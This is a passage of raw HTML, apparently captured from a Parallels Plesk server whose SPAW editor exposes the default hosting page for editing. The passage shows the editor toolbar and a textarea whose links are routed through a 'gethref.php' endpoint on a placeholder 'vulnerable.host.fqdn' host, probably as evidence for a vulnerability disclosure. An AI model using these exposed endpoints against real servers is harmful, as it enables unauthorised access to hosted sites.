   <option value='UTF-32LE'>UTF-32LE</option>
   <option value='UTF-7'>UTF-7</option>
   <option value='UTF-8' SELECTED>UTF-8</option>
   <option value='VISCII'>VISCII</option>
   <option value='WINBALTRIM'>WINBALTRIM</option>
   <option value='WINDOWS-1250'>WINDOWS-1250</option>
   <option value='WINDOWS-1251'>WINDOWS-1251</option>
   <option value='WINDOWS-1252'>WINDOWS-1252</option>
   <option value='WINDOWS-1253'>WINDOWS-1253</option>
   <option value='WINDOWS-1254'>WINDOWS-1254</option>
   <option value='WINDOWS-1255'>WINDOWS-1255</option>
   <option value='WINDOWS-1256'>WINDOWS-1256</option>
   <option value='WINDOWS-1257'>WINDOWS-1257</option>
   <option value='WINDOWS-1258'>WINDOWS-1258</option>
</select>
</td>
               <td><DIV class="commonButton" id="bid-reload" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to reload the current file&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);reload_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_reload" id="buttonid-reload" type="button" onClick="Event.stop(event);reload_oC(document.forms[0]);;return false;">Reload</BUTTON><SPAN id="spanid-reload">Reload</SPAN></DIV> <span class="hint">(Note: any unsaved changes will be lost on reloading)</span></td>
           </tr>
       </table>
       <br/>
       <script language='JavaScript'>
<!--
var spaw_active_toolbar = true;
//-->
</script>
<script language="JavaScript" src="/spaw/spaw_script.js.php"></script>

<script language="JavaScript" src="/spaw/lib/themes/default/js/toolbar.js.php"></script><link rel="stylesheet" type="text/css" href="/spaw/lib/themes/default/css/toolbar.css"><table border="0" cellspacing="0" cellpadding="0" width="100%" height="300px"><tr><td id="SPAW_spaw2_toolbar_top_design" class="SPAW_default_toolbar" colspan="3"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td align="left" valign="top" class="SPAW_default_toolbar_top" nowrap="yes"><img id="SPAW_spaw2_tb_cut" alt="Cut" title="Cut" src="/spaw/lib/themes/default/img/tb_cut.gif" onClick="SPAW_cut_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_copy" alt="Copy" title="Copy" src="/spaw/lib/themes/default/img/tb_copy.gif" onClick="SPAW_copy_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_paste" alt="Paste" title="Paste" src="/spaw/lib/themes/default/img/tb_paste.gif" onClick="SPAW_paste_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_undo" alt="Undo" title="Undo" src="/spaw/lib/themes/default/img/tb_undo.gif" onClick="SPAW_undo_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_redo" alt="Redo" title="Redo" src="/spaw/lib/themes/default/img/tb_redo.gif" onClick="SPAW_redo_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_hyperlink" alt="Hyperlink" title="Hyperlink" src="/spaw/lib/themes/default/img/tb_hyperlink.gif" onClick="SPAW_hyperlink_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_image_insert" alt="Insert image" title="Insert image" src="/spaw/lib/themes/default/img/tb_image_insert.gif" onClick="SPAW_image_insert_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_image_prop" alt="Image properties" title="Image properties" src="/spaw/lib/themes/default/img/tb_image_prop.gif" onClick="SPAW_image_prop_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_image_popup" alt="Image popup" title="Image popup" src="/spaw/lib/themes/default/img/tb_image_popup.gif" onClick="SPAW_image_popup_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_hr" alt="Horizontal rule" title="Horizontal rule" src="/spaw/lib/themes/default/img/tb_hr.gif" onClick="SPAW_hr_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_table_create" alt="Create table" title="Create table" src="/spaw/lib/themes/default/img/tb_table_create.gif" onClick="SPAW_table_create_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_prop" alt="Table properties" title="Table properties" src="/spaw/lib/themes/default/img/tb_table_prop.gif" onClick="SPAW_table_prop_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_cell_prop" alt="Cell properties" title="Cell properties" src="/spaw/lib/themes/default/img/tb_table_cell_prop.gif" onClick="SPAW_table_cell_prop_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_row_insert" alt="Insert row" title="Insert row" src="/spaw/lib/themes/default/img/tb_table_row_insert.gif" onClick="SPAW_table_row_insert_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_column_insert" alt="Insert column" title="Insert column" src="/spaw/lib/themes/default/img/tb_table_column_insert.gif" onClick="SPAW_table_column_insert_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_row_delete" alt="Delete row" title="Delete row" src="/spaw/lib/themes/default/img/tb_table_row_delete.gif" onClick="SPAW_table_row_delete_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_column_delete" alt="Delete column" title="Delete column" src="/spaw/lib/themes/default/img/tb_table_column_delete.gif" onClick="SPAW_table_column_delete_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_cell_merge_right" alt="Merge right" title="Merge right" src="/spaw/lib/themes/default/img/tb_table_cell_merge_right.gif" onClick="SPAW_table_cell_merge_right_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_cell_merge_down" alt="Merge down" title="Merge down" src="/spaw/lib/themes/default/img/tb_table_cell_merge_down.gif" onClick="SPAW_table_cell_merge_down_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_cell_split_horizontal" alt="Split cell horizontally" title="Split cell horizontally" src="/spaw/lib/themes/default/img/tb_table_cell_split_horizontal.gif" onClick="SPAW_table_cell_split_horizontal_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_cell_split_vertical" alt="Split cell vertically" title="Split cell vertically" src="/spaw/lib/themes/default/img/tb_table_cell_split_vertical.gif" onClick="SPAW_table_cell_split_vertical_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"></td></tr><tr><td align="left" valign="top" class="SPAW_default_toolbar_top" nowrap="yes"><select size="1" id="SPAW_spaw2_tb_style" name="SPAW_spaw2_tb_style" align="absmiddle" class="SPAW_default_tb_input" onchange="SPAW_style_change('spaw2',this)" ><option>Style</option><option value="default">Normal</option></select><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_bold" alt="Bold" title="Bold" src="/spaw/lib/themes/default/img/tb_bold.gif" onClick="SPAW_bold_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_italic" alt="Italic" title="Italic" src="/spaw/lib/themes/default/img/tb_italic.gif" onClick="SPAW_italic_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_underline" alt="Underline" title="Underline" src="/spaw/lib/themes/default/img/tb_underline.gif" onClick="SPAW_underline_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_strike" alt="" title="" src="/spaw/lib/themes/default/img/tb_strike.gif" onClick="SPAW_strike_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_ordered_list" alt="Ordered list" title="Ordered list" src="/spaw/lib/themes/default/img/tb_ordered_list.gif" onClick="SPAW_ordered_list_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_bulleted_list" alt="Bulleted list" title="Bulleted list" src="/spaw/lib/themes/default/img/tb_bulleted_list.gif" onClick="SPAW_bulleted_list_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_indent" alt="Indent" title="Indent" src="/spaw/lib/themes/default/img/tb_indent.gif" onClick="SPAW_indent_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_unindent" alt="Unindent" title="Unindent" src="/spaw/lib/themes/default/img/tb_unindent.gif" onClick="SPAW_unindent_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_left" alt="Left" title="Left" src="/spaw/lib/themes/default/img/tb_left.gif" onClick="SPAW_left_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_center" alt="Center" title="Center" src="/spaw/lib/themes/default/img/tb_center.gif" onClick="SPAW_center_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_right" alt="Right" title="Right" src="/spaw/lib/themes/default/img/tb_right.gif" onClick="SPAW_right_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_justify" alt="" title="" src="/spaw/lib/themes/default/img/tb_justify.gif" onClick="SPAW_justify_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_fore_color" alt="Fore color" title="Fore color" src="/spaw/lib/themes/default/img/tb_fore_color.gif" onClick="SPAW_fore_color_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_bg_color" alt="Background color" title="Background color" src="/spaw/lib/themes/default/img/tb_bg_color.gif" onClick="SPAW_bg_color_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_superscript" alt="Superscript" title="Superscript" src="/spaw/lib/themes/default/img/tb_superscript.gif" onClick="SPAW_superscript_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_subscript" alt="Subscript" title="Subscript" src="/spaw/lib/themes/default/img/tb_subscript.gif" onClick="SPAW_subscript_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_cleanup" alt="HTML cleanup (remove styles)" title="HTML cleanup (remove styles)" src="/spaw/lib/themes/default/img/tb_cleanup.gif" onClick="SPAW_cleanup_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_toggle_borders" alt="Toggle borders" title="Toggle borders" src="/spaw/lib/themes/default/img/tb_toggle_borders.gif" onClick="SPAW_toggle_borders_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"></td></tr></table></td><td id="SPAW_spaw2_toolbar_top_html" class="SPAW_default_toolbar" colspan="3" style="display : none;"></td></tr><tr><td id="SPAW_spaw2_toolbar_left_design" valign="top" class="SPAW_default_toolbar" ></td><td id="SPAW_spaw2_toolbar_left_html" valign="top" class="SPAW_default_toolbar" style="display : none;"></td><td align="left" valign="top" width="100%" height="100%"><textarea id="spaw2" name="spaw2" style="width:100%; height:300px; display:none;" class="SPAW_default_editarea">
&lt;div class=&quot;page&quot;&gt;
&lt;div class=&quot;header clear&quot;&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
//&lt;![CDATA[
if (window.product_copyrights) { writeHeader(); }
//]]&gt;
&lt;/script&gt;
&lt;/div&gt;

&lt;div id=&quot;body&quot; class=&quot;clear&quot;&gt;
&lt;div class=&quot;box&quot;&gt;
&lt;em class=&quot;tl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;tr&quot;&gt;&lt;/em&gt;&lt;em class=&quot;bl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;br&quot;&gt;&lt;/em&gt;
&lt;div class=&quot;content&quot;&gt;
&lt;div class=&quot;globe&quot;&gt;&lt;/div&gt;
&lt;div class=&quot;welcome&quot;&gt;
&lt;h2&gt;Welcome to Parallels!&lt;/h2&gt;
&lt;p&gt;If you are seeing this message, the website for &lt;script type=&quot;text/javascript&quot;&gt;
//&lt;![CDATA[
document.write('&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://' + (location.hostname.indexOf(':')&gt;=0?'['+location.hostname+']':location.hostname) + '&quot;&gt;' + location.hostname + '&lt;/a&gt;');
//]]&gt;
&lt;/script&gt; is not available at this time.&lt;/p&gt;
&lt;p&gt;If you are the owner of this website, one of the following things may be occurring:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You have not put any content on your website.&lt;/li&gt;
&lt;li&gt;Your provider has suspended this page.&lt;/li&gt;
&lt;/ul&gt;
&lt;p class=&quot;hr&quot;&gt;Please login to &lt;script type=&quot;text/javascript&quot;&gt;
//&lt;![CDATA[
document.write('&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=https://' + (location.hostname.indexOf(':')&gt;=0?'['+location.hostname+']':location.hostname) + ':8443&quot;&gt;https://' + (location.hostname.indexOf(':')&gt;=0?'['+location.hostname+']':location.hostname) +':8443&lt;/a&gt;');
//]]&gt;
&lt;/script&gt; to receive instructions on setting up your website&lt;/p&gt;&lt;br /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;new-to-parallels&quot;&gt;
&lt;h3&gt;New to &lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/intro&quot;&gt;Parallels&lt;/a&gt;?&lt;/h3&gt;
&lt;div class=&quot;box&quot;&gt;
&lt;em class=&quot;tl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;tr&quot;&gt;&lt;/em&gt;&lt;em class=&quot;bl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;br&quot;&gt;&lt;/em&gt;
&lt;div class=&quot;content&quot;&gt;
&lt;p&gt;Parallels is a worldwide leader in virtualization and automation software that optimizes computing for consumers, businesses, and Cloud services providers across all major hardware, operating systems, and virtualization platforms.&lt;/p&gt;
&lt;p&gt;For the Cloud, Parallels automation and virtualization software enables cloud services providers to rapidly and profitably deliver the widest range of cloud services that small businesses want and need. Our software includes key building blocks of cloud service delivery - self service control panels, billing, cloud service provisioning and virtualization. We enable the delivery of all types of services that small businesses need - shared web hosting and web applications, messaging and collaboration services, virtualized infrastructure services and thousands of other applications.&lt;/p&gt;
&lt;p&gt;Our Automation products allow businesses to optimize their systems to maximize profit. Our Virtualization products allow personal computers to run several operating systems on one computer (like OSX and Windows) and for individual servers to function like many servers at once for creating cloud computing environments.&lt;/p&gt;
&lt;p&gt;This website was created using our Parallels Panel product. We offer a full line of Billing, Sitebuilder and cloud computing tools. Please visit &lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/intro&quot;&gt;www.parallels.com&lt;/a&gt; to find out more information.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Test pages&lt;/h3&gt;
&lt;div class=&quot;box&quot;&gt;
&lt;em class=&quot;tl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;tr&quot;&gt;&lt;/em&gt;&lt;em class=&quot;bl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;br&quot;&gt;&lt;/em&gt;
&lt;div class=&quot;content&quot;&gt;
&lt;p&gt;Parallels Plesk Panel provides several test pages that you can use for checking the scripting features, testing database connections and mail sending. Click an icon to see test pages for different scripts:&lt;/p&gt;&lt;br /&gt;
&lt;p class=&quot;center&quot;&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=test/aspnet/test.aspx&quot; class=&quot;icon&quot; id=&quot;aspnet&quot;&gt;&lt;span&gt;ASP.NET&lt;/span&gt;&lt;/a&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=test/python/test.py&quot; class=&quot;icon&quot; id=&quot;python&quot;&gt;&lt;span&gt;Python&lt;/span&gt;&lt;/a&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=test/php/test.php&quot; class=&quot;icon&quot; id=&quot;php&quot;&gt;&lt;span&gt;PHP&lt;/span&gt;&lt;/a&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=test/perl/test.pl&quot; class=&quot;icon&quot; id=&quot;perl&quot;&gt;&lt;span&gt;Perl&lt;/span&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;products&quot;&gt;
&lt;h3&gt;Consumer Products&lt;/h3&gt;
&lt;div class=&quot;box&quot;&gt;
&lt;em class=&quot;tl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;tr&quot;&gt;&lt;/em&gt;&lt;em class=&quot;bl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;br&quot;&gt;&lt;/em&gt;
&lt;div class=&quot;content&quot;&gt;
&lt;div class=&quot;column left&quot;&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/desktop/intro&quot;&gt;Parallels&amp;reg;&lt;br /&gt;Desktop for Mac&lt;/a&gt;&lt;/strong&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/desktop/intro&quot;&gt;&lt;img src=&quot;http://www.vulnerable.host.fqdn:8880/spaw/getimg.php?img=img/apps/pd-box.gif&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;
&lt;p&gt;The best solution for running Windows, Linux, or any of many other operating systems alongside OS X.&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;column right&quot;&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/desktop/pd4wl/intro&quot;&gt;Parallels&amp;reg; Desktop for&lt;br /&gt;Windows and Linux&lt;/a&gt;&lt;/strong&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/desktop/pd4wl/intro&quot;&gt;&lt;img src=&quot;http://www.vulnerable.host.fqdn:8880/spaw/getimg.php?img=img/apps/pdfwl-box.gif&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;
&lt;p&gt;Simultaneously run multiple operating systems on your PC&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;box-vz-products&quot; style=&quot;display: none&quot;&gt;
&lt;h3&gt;Business Products&lt;/h3&gt;
&lt;div class=&quot;box&quot;&gt;
&lt;em class=&quot;tl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;tr&quot;&gt;&lt;/em&gt;&lt;em class=&quot;bl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;br&quot;&gt;&lt;/em&gt;
&lt;div class=&quot;content&quot;&gt;
&lt;div class=&quot;column left&quot;&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/server/intro&quot;&gt;Parallels&amp;reg; Server&lt;/a&gt;&lt;/strong&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/server/intro&quot;&gt;&lt;img src=&quot;http://www.vulnerable.host.fqdn:8880/spaw/getimg.php?img=img/apps/server-box.gif&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;
&lt;p&gt;Hypervisor Virtualization technology for&lt;br /&gt;using many OSs&lt;br /&gt;on one server&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;column right&quot;&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/containers/intro&quot;&gt;Parallels&amp;reg; Container&lt;/a&gt;&lt;/strong&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/containers/intro&quot;&gt;&lt;img src=&quot;http://www.vulnerable.host.fqdn:8880/spaw/getimg.php?img=img/apps/container-box.gif&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;
&lt;p&gt;Our Container solution creates the highest density of virtualized servers&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Service Provider Products&lt;/h3&gt;
&lt;div class=&quot;box&quot;&gt;
&lt;em class=&quot;tl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;tr&quot;&gt;&lt;/em&gt;&lt;em class=&quot;bl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;br&quot;&gt;&lt;/em&gt;
&lt;div class=&quot;content&quot;&gt;
&lt;div class=&quot;column left&quot;&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/automation/intro&quot;&gt;Parallels&amp;reg; Automation&lt;/a&gt;&lt;/strong&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/automation/intro&quot;&gt;&lt;img src=&quot;http://www.vulnerable.host.fqdn:8880/spaw/getimg.php?img=img/apps/poa-box.gif&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;
&lt;p&gt;Hosting, SaaS, and cloud computing automation solution.&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;column right&quot;&gt;
